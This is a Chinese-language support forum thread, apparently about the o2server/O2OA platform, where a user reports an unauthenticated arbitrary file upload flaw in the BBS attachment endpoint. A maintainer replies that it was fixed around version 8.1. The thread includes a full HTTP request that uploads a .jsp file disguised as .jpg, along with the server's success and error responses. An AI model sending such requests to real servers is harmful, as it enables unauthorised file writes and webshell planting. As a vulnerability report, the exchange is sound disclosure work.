文件上传有漏洞
本帖最后由 feifeimao 于 2023-11-4 16:06 编辑平台被检测到有文件上传的漏洞,这个看起来应该是论坛模块的 具体的漏洞形式是什么,任意文件上传还是什么? Ray 发表于 2023-11-6 11:29
具体的漏洞形式是什么,任意文件上传还是什么?
能上传任意文件 您是什么版本的o2server?这个问题已经修复过了的,应该在8.1的版本就修复好了 Ray 发表于 2023-11-6 11:29
具体的漏洞形式是什么,任意文件上传还是什么?
未授权任意文件上传,可以在不登录情况下直接往bbs下面存储文件夹写文件
POST /x_bbs_assemble_control/jaxrs/attachment/upload/subject/161ccc21-3178-4e21-9b6f-5d36aed65ecb HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1435424574173394427053965142
Content-Length: 467
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
SL-CE-SUID: 21
-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="site"
161ccc21-3178-4e21-9b6f-5d36aed65ecb
-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="file"; filename="1.jsp"
123
-----------------------------1435424574173394427053965142
Content-Disposition: form-data; name="fileName"
1.jpg
-----------------------------1435424574173394427053965142--
{
"type": "success",
"data": {
"id": "0b0dd619-619a-433a-8578-1fd863117092"
},
"message": "",
"date": "2023-11-05 22:55:05",
"spent": 1674,
"size": -1,
"count": 0,
"position": 0
}
{
"type": "error",
"message": "附件:1.jsp, 不符合上传类型.",
"date": "2023-11-05 22:56:41",
"spent": 7,
"size": -1,
"count": 0,
"position": 0,
"prompt": "com.x.base.core.project.exception.ExceptionAttachmentInvalid"
} 不明白您的意思,看提示不是没上传成功吗?
页:
[1]